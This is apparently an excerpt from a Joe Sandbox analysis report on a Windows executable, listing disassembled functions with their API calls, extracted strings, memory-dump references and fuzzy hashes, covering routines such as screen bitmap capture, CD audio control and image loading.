                                                                                                Function 004313CA Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetDC.USER32(00000000), ref: 0043143E
                                                                                                • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0043144F
                                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 00431459
                                                                                                • SelectObject.GDI32(00000000,?), ref: 00431466
                                                                                                • StretchBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 004314CC
                                                                                                • GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00431505
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: CompatibleCreate$BitmapBitsObjectSelectStretch
                                                                                                • String ID: (
                                                                                                • API String ID: 3300687185-3887548279
                                                                                                • Opcode ID: 54198b849531af9165e9bec096bf8ea3e4974b91d89a9c814b262d795432971a
                                                                                                • Instruction ID: 70523424e9a4c52fdd53d867b9eeb1eac2d89839f103c71a78559f5a5eece38f
                                                                                                • Opcode Fuzzy Hash: 54198b849531af9165e9bec096bf8ea3e4974b91d89a9c814b262d795432971a
                                                                                                • Instruction Fuzzy Hash: 63514971A00209AFDB14CF98C884FAFBBB8EF49310F10891DFA5997290D774A940CBA4
                                                                                                Function 0045DA73 Relevance: 21.1, APIs: 4, Strings: 8, Instructions: 141COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                                                                                  • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                                                                                • GetDriveTypeW.KERNEL32 ref: 0045DB32
                                                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DB78
                                                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBB3
                                                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBED
                                                                                                  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: SendString$_wcslen$BuffCharDriveLowerType_memmove
                                                                                                • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                • API String ID: 1976180769-4113822522
                                                                                                • Opcode ID: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                                                                                                • Instruction ID: 81dc6b2e9a5b1b7ac5bd11c7175921e379baf9e0c2b27e14ed053c07c028f3b1
                                                                                                • Opcode Fuzzy Hash: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                                                                                                • Instruction Fuzzy Hash: 75516E715043049FD710EF21C981B5EB3E4BF88304F14896FF995AB292D7B8E909CB5A
                                                                                                Function 00432A10 Relevance: 21.1, APIs: 14, Instructions: 140timeCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: _wcslen$_wcsncpy$LocalTime__fassign
                                                                                                • String ID:
                                                                                                • API String ID: 461458858-0
                                                                                                • Opcode ID: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                                                                                                • Instruction ID: 9848deb76f2cd1bd94a84263f46e444e1138d8b87e7a9916e51222e649cc75ea
                                                                                                • Opcode Fuzzy Hash: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                                                                                                • Instruction Fuzzy Hash: B1417372D10204B6CF10EFA5C946ADFF3B8DF49314F90885BE909E3121F6B4E65583A9
                                                                                                Function 0043009D Relevance: 21.1, APIs: 14, Instructions: 134filecommemoryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004300C3
                                                                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 004300DE
                                                                                                • GlobalAlloc.KERNEL32(00000002,00000000), ref: 004300E9
                                                                                                • GlobalLock.KERNEL32(00000000), ref: 004300F6
                                                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00430105
                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 0043010C
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00430113
                                                                                                • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00430120
                                                                                                • OleLoadPicture.OLEAUT32(?,00000000,00000000,004829F8,?), ref: 0043013E
                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00430150
                                                                                                • GetObjectW.GDI32(?,00000018,?), ref: 00430177
                                                                                                • CopyImage.USER32(?,00000000,?,?,00002000), ref: 004301A8
                                                                                                • DeleteObject.GDI32(?), ref: 004301D0
                                                                                                • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 004301E7
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                • String ID:
                                                                                                • API String ID: 3969911579-0
                                                                                                • Opcode ID: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                                                                                • Instruction ID: 40287395d2d29e4935595b2baf4d6657c54b4003bec4d35786bf86d2452689d1
                                                                                                • Opcode Fuzzy Hash: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                                                                                • Instruction Fuzzy Hash: 41414C75600208AFDB10DF64DD88FAE77B8EF48711F108659FA05AB290D7B5AD01CB68
                                                                                                Function 004551F5 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 115windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Menu$Delete$Destroy$ItemObject$CountDrawIconInfoWindow
                                                                                                • String ID: 0
                                                                                                • API String ID: 956284711-4108050209
                                                                                                • Opcode ID: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                                                                                                • Instruction ID: b5af5d15e8ca477bb279da78e69062a53aed449fe0dbaae2e4c2ef00f9b57ed5
                                                                                                • Opcode Fuzzy Hash: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                                                                                                • Instruction Fuzzy Hash: 91412770200601AFD714DF64D9A8B6B77A8BF48302F10896DFD45CB292D778E848CFA9
                                                                                                Function 00433493 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 84networkCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: _wcscpy$Cleanup$Startup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                                                • String ID: 0.0.0.0
                                                                                                • API String ID: 1965227024-3771769585
                                                                                                • Opcode ID: fae7ff6cb08d49b7abbddf1c7acdf758c3bbd000e7fec019eac0b45bea4aa72c
                                                                                                • Instruction ID: 28916de6e65f37ac85efecafd260a3a31c9a3caf28ae6c56f7260ddb0d4b80cb
                                                                                                • Opcode Fuzzy Hash: fae7ff6cb08d49b7abbddf1c7acdf758c3bbd000e7fec019eac0b45bea4aa72c
                                                                                                • Instruction Fuzzy Hash: 4F213A32A00114BBC710AF65DC05EEF736CEF99716F0045AFF90993151EEB99A8187E8
                                                                                                Function 0045F56D Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 78COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0045F5D5
                                                                                                • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F5EC
                                                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045F5FE
                                                                                                • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0045F611
                                                                                                • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F61E
                                                                                                • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0045F634
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: SendString$_memmove_wcslen
                                                                                                • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                • API String ID: 369157077-1007645807
                                                                                                • Opcode ID: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                                                                                                • Instruction ID: e81aaa69409cfefceaf3864659f825962b2ddf67c6d06b6a861a29a56a66176d
                                                                                                • Opcode Fuzzy Hash: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                                                                                                • Instruction Fuzzy Hash: 7F21A83168021D66E720FB95DC46FFE7368AF40700F20087BFA14B71D1DAB4A949879D
                                                                                                Function 00445BE4 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 77windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetParent.USER32 ref: 00445BF8
                                                                                                • GetClassNameW.USER32(00000000,?,00000100), ref: 00445C0D
                                                                                                • __wcsicoll.LIBCMT ref: 00445C33
                                                                                                • __wcsicoll.LIBCMT ref: 00445C4F
                                                                                                • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00445CA9
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: __wcsicoll$ClassMessageNameParentSend
                                                                                                • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                • API String ID: 3125838495-3381328864
                                                                                                • Opcode ID: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                                                                                                • Instruction ID: b9a51c7f116d0e73852bd225d20f6d8bcb5f39b8f57bd3164038c04ed7d94027
                                                                                                • Opcode Fuzzy Hash: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                                                                                                • Instruction Fuzzy Hash: C6110AB1E447017BFE10BA659D46EBB339C9B54B11F00051BFE44D7242F6ACA94147A9
                                                                                                Function 004491B9 Relevance: 19.7, APIs: 13, Instructions: 246windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • SendMessageW.USER32(?,?,000000FF,?), ref: 004492A4
                                                                                                • SendMessageW.USER32(?,?,00000000,00000000), ref: 004492B7
                                                                                                • CharNextW.USER32(?,?,?,000000FF,?), ref: 004492E9
                                                                                                • SendMessageW.USER32(?,?,00000000,00000000), ref: 00449301
                                                                                                • SendMessageW.USER32(?,?,00000000,?), ref: 00449332
                                                                                                • SendMessageW.USER32(?,?,000000FF,?), ref: 00449349
                                                                                                • SendMessageW.USER32(?,?,00000000,00000000), ref: 0044935C
                                                                                                • SendMessageW.USER32(?,00000402,?), ref: 00449399
                                                                                                • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0044940D
                                                                                                • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$CharNext
                                                                                                • String ID:
                                                                                                • API String ID: 1350042424-0
                                                                                                • Opcode ID: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                                                                                • Instruction ID: 867fdc7b80e212b75fe5daf06e5219747a853435bb2a874e280223eddbea68d3
                                                                                                • Opcode Fuzzy Hash: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                                                                                • Instruction Fuzzy Hash: 5B81D535A00119BBEB10CF85DD80FFFB778FB55720F10825AFA14AA280D7B99D4197A4
                                                                                                Function 00478656 Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 197COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                                                                                  • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                                                                                • GetDriveTypeW.KERNEL32(?), ref: 004787B9
                                                                                                • _wcscpy.LIBCMT ref: 004787E5
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: BuffCharDriveLowerType_wcscpy_wcslen
                                                                                                • String ID: \VH$a$all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                • API String ID: 3052893215-2127371420
                                                                                                • Opcode ID: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                                                                                                • Instruction ID: 541bc2b2506c052d744bcb7e7e177e26c036821b53f5a58429f0f0853ea8de24
                                                                                                • Opcode Fuzzy Hash: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                                                                                                • Instruction Fuzzy Hash: 4761C1716443018BD700EF14CC85B9BB7D4AB84348F14892FF949AB382DB79E94987AB
                                                                                                Function 0045E737 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 163COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E77F
                                                                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                • LoadStringW.USER32(?,?,?,00000FFF), ref: 0045E7A0
                                                                                                • __swprintf.LIBCMT ref: 0045E7F7
                                                                                                • _wprintf.LIBCMT ref: 0045E8B3
                                                                                                • _wprintf.LIBCMT ref: 0045E8D7
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                                                                                • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                • API String ID: 2295938435-2354261254
                                                                                                • Opcode ID: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                                                                                                • Instruction ID: 453f5dd12ee62c270a242db3517b58e8b6225e49c0ff470bc5072f32437c925c
                                                                                                • Opcode Fuzzy Hash: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                                                                                                • Instruction Fuzzy Hash: 6A519E71A10219ABDB14EB91CC85EEF7778AF44314F14407EF90477292DB78AE49CBA8
                                                                                                Function 004531B1 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 160COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: __swprintf_wcscpy$__i64tow__itow
                                                                                                • String ID: %.15g$0x%p$False$True
                                                                                                • API String ID: 3038501623-2263619337
                                                                                                • Opcode ID: dbd07ee36d68efbdb82b47f6bbdb5a558a403895529f1bd62c5843a789ef215e
                                                                                                • Instruction ID: fd507a47f7d2c8f7f5848ea17d112ce969af4838d766d220e6d3988dad71e25c
                                                                                                • Opcode Fuzzy Hash: dbd07ee36d68efbdb82b47f6bbdb5a558a403895529f1bd62c5843a789ef215e
                                                                                                • Instruction Fuzzy Hash: 264108729001005BDB10EF75DC42FAAB364EF55306F0445ABFE09CB242EA39DA48C79A
                                                                                                Function 0045E538 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 154COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E580
                                                                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                • LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0045E59F
                                                                                                • __swprintf.LIBCMT ref: 0045E5F6
                                                                                                • _wprintf.LIBCMT ref: 0045E6A3
                                                                                                • _wprintf.LIBCMT ref: 0045E6C7
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
